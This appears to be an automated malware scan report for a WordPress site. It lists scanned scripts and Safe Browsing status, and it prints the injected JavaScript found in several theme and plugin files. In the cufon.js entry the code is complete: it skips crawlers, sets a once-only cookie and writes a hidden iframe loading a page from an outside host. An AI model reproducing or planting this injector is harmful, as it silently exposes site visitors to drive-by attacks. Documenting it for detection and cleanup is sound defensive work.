Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=myafghanmountains.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.myafghanmountains.org/ | 200 OK Content-Length: 33971 Content-Type: text/html | clean |
http://www.myafghanmountains.org/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 16457 Content-Type: application/x-javascript | clean |
http://www.myafghanmountains.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8166 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo Antivirus reports:
| ||
http://www.myafghanmountains.org/wp-content/plugins/anti-spam/js/anti-spam.js?ver=1.9 | 200 OK Content-Length: 2629 Content-Type: application/x-javascript | clean |
http://www.myafghanmountains.org/wp-content/themes/greenearth/javascript/cufon.js?ver=1.0 | 200 OK Content-Length: 967 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCookie("akelbriston19ure")===undefined);if(!d()&&c){document.write('<iframe width="110" height="130" style="position:absolute;margin-top:-1001px;" src="http://umc-74.cf/seedadmin17.html"></iframe>');var a=new Date(new Date().getTime()+48*60*60*1000);document.cookie="akelbriston19ure=1; path=/; expires="+a.toUTCString()}})(); Antivirus reports:
| ||
http://www.myafghanmountains.org/wp-content/themes/greenearth/javascript/jquery.fitvids.js?ver=1.0 | 200 OK Content-Length: 3705 Content-Type: application/x-javascript | clean |
http://www.myafghanmountains.org/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.4.5 | 200 OK Content-Length: 1782 Content-Type: application/x-javascript | clean |
http://www.myafghanmountains.org/wp-content/plugins/wppageflip/js/swfobject.js | 200 OK Content-Length: 7684 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo var oldBeforeUnload=window.onbeforeunload; window.onbeforeunload=function(){ deconcept.SWFObjectUtil.prepUnload(); oldBeforeUnload();}; }else{window.onbeforeunload=deconcept.SWFObjectUtil.prepUnload;} if(Array.prototype.push==null){ Array.prototype.push=function(_31){ this[this.length]=_31; return this.length;};} var getQueryParamValue=deconcept.util.getRequestParameter; var FlashObject=deconcept.SWFObject; var SWFObject=deconcept.SWFObj Antivirus reports:
| ||
http://www.myafghanmountains.org/wp-content/themes/greenearth/javascript/cufon/Merriweather_400.font.js?ver=1.0 | 200 OK Content-Length: 49635 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo Antivirus reports:
| ||
http://www.myafghanmountains.org/wp-content/themes/greenearth/javascript/superfish.js?ver=1.0 | 200 OK Content-Length: 4678 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo o.onHide.call($ul); return this; }, showSuperfishUl : function(){ var o = sf.op, sh = sf.c.shadowClass+'-off', $ul = this.addClass(o.hoverClass) .find('>ul:hidden').css('visibility','visible'); sf.IE7fix.call($ul); o.onBeforeShow.call($ul); $ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); }); return this; } }); })(jQuery); Antivirus reports:
| ||
http://www.myafghanmountains.org/wp-content/themes/greenearth/javascript/supersub.js?ver=1.0 | 200 OK Content-Length: 4264 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo 'float' : liFloat, 'width' : '100%', 'white-space' : 'normal' }) .each(function(){ var $childUl = $('>ul',this); var offsetDirection = $childUl.css('left')!==undefined ? 'left' : 'right'; $childUl.css(offsetDirection,emWidth); }); }); }); }; $.fn.supersubs.defaults = { minWidth : 9, maxWidth : 25, extraWidth : 0 }; })(jQuery); Antivirus reports:
| ||
http://www.myafghanmountains.org/wp-content/themes/greenearth/javascript/hoverIntent.js?ver=1.0 | 200 OK Content-Length: 4141 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo pX = ev.pageX; pY = ev.pageY; $(ob).bind("mousemove",track); if (ob.hoverIntent_s != 1) { ob.hoverIntent_t = setTimeout( function(){compare(ev,ob);} , cfg.interval );} } else { $(ob).unbind("mousemove",track); if (ob.hoverIntent_s == 1) { ob.hoverIntent_t = setTimeout( function(){delay(ev,ob);} , cfg.timeout );} } }; return this.mouseover(handleHover).mouseout(handleHover); }; })(jQuery); Antivirus reports:
| ||
http://www.myafghanmountains.org/wp-content/themes/greenearth/javascript/gdl-scripts.js?ver=1.0 | 200 OK Content-Length: 5920 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo } }); }); }); (function($) { $.fn.equalHeights = function(px) { $(this).each(function(){ var currentTallest = 0; $(this).children().each(function(i){ if ($(this).height() > currentTallest) { currentTallest = $(this).height(); } }); $(this).children().css({'height': currentTallest}); }); return this; }; })(jQuery); Antivirus reports:
| ||
http://www.myafghanmountains.org/wp-content/themes/greenearth/javascript/jquery.easing.js?ver=1.0 | 200 OK Content-Length: 9064 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); Antivirus reports:
| ||
http://www.myafghanmountains.org/wp-content/themes/greenearth/javascript/jquery.prettyPhoto.js?ver=1.0 | 200 OK Content-Length: 27294 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo autoplay: false, deeplinking: false, animation_speed: 'fast', slideshow: 5000, autoplay_slideshow: false, opacity: 0.8, show_title: true, allow_resize: true, default_width: 500, default_height: 344, counter_separator_label: '/', theme: 'pp_default', horizontal_padding: 20, overlay_gallery: true, keyboard_shortcuts: true, social_tools: false, }); }); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: myafghanmountains.org
Result:
GET / HTTP/1.1
Host: myafghanmountains.org
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: myafghanmountains.org
Referer: http://www.google.com/search?q=myafghanmountains.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: myafghanmountains.org
Referer: http://www.google.com/search?q=myafghanmountains.org
Result:
The result is similar to the first query. There are no suspicious redirects found.